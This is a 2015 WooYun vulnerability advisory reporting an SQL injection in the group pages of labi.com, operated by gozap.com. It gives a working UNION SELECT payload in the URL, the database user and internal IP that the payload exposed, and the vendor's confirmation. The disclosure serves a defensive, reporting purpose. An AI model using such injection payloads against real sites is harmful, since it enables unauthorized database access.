漏洞概要关注数(0)关注此漏洞

漏洞概要
关注数(
0
)
关注此漏洞
缺陷编号：
WooYun-2015-112742
漏洞标题：		北京格致璞某站sql注入
相关厂商：
gozap.com
漏洞作者：
路人甲
提交时间：		2015-05-08 14:41
公开时间：		2015-06-22 17:02
漏洞类型：		SQL注射漏洞
危害等级：		高
自评Rank：		15
漏洞状态：
															厂商已经确认
漏洞来源：
http://www.wooyun.org
，如有疑问或需要帮助请联系 help@wooyun.org
Tags标签：
php+数字类型注射
0
人收藏
收藏
分享漏洞：
0
漏洞详情
披露状态：
2015-05-08：	细节已通知厂商并且等待厂商处理中
2015-05-08：	厂商已经确认，细节仅向厂商公开
2015-05-18：	细节向核心白帽子及相关领域专家公开
2015-05-28：	细节向普通白帽子公开
2015-06-07：	细节向实习白帽子公开
2015-06-22：	细节向公众公开
简要描述：
北京格致璞某站sql注入
详细说明：
问题出在旗下的蜡笔网站
http://www.labi.com
注册登录后访问群组功能
http://www.labi.com/groups/
创建个群组后进入，例如：
http://www.labi.com/groups/1930/feeds
goups的id处可以注入
访问
http://www.labi.com/groups/1930%20and%201=2%20union%20select%201,2,3,user%28%29,5,6,7,8,9,10,11/contacts/1
当前用户为
mylabisyncol@192.168.2.163
漏洞证明：
如上
修复方案：
过滤注入
版权声明：转载请注明来源
路人甲
@
乌云
漏洞回应
厂商回应：
危害等级：高
漏洞Rank：15
确认时间：2015-05-08 17:01
厂商回复：
谢谢 我们会尽快修复此漏洞
最新状态：
暂无
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价
(共
0
人评价)
:
登陆后才能进行评分
评价